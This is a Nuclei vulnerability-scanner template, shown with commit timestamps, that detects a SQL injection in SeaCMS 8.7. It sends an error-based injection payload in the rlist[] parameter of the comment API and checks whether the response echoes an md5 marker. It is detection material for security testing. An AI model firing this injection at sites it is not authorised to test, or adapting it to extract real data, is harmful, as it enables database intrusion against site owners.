nuclei-templates/http/vulnerabilities/other/seacms-sqli.yaml

38 lines
1007 B
YAML
Raw Normal View History

2022-04-05 13:12:45 +00:00
id: seacms-sqli
2022-04-05 13:12:45 +00:00
info:
name: SeaCMS 8.7 - SQL Injection
2022-04-05 13:12:45 +00:00
author: ritikchaddha
severity: critical
description: SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-05 13:12:45 +00:00
reference:
- https://www.uedbox.com/post/54561/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-04-06 04:48:53 +00:00
tags: seacms,sqli
2022-04-05 13:12:45 +00:00
2022-06-30 03:13:38 +00:00
variables:
num: "999999999"
http:
2022-04-05 13:12:45 +00:00
- method: GET
path:
2022-06-30 03:13:38 +00:00
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
2022-04-06 04:48:53 +00:00
host-redirects: true
2022-04-06 04:48:53 +00:00
max-redirects: 2
2022-04-05 13:12:45 +00:00
matchers-condition: and
matchers:
2022-04-06 04:48:53 +00:00
- type: word
part: body
words:
2022-06-30 03:13:38 +00:00
- '{{md5({{num}})}}'
2022-04-06 04:48:53 +00:00
2022-04-05 13:12:45 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28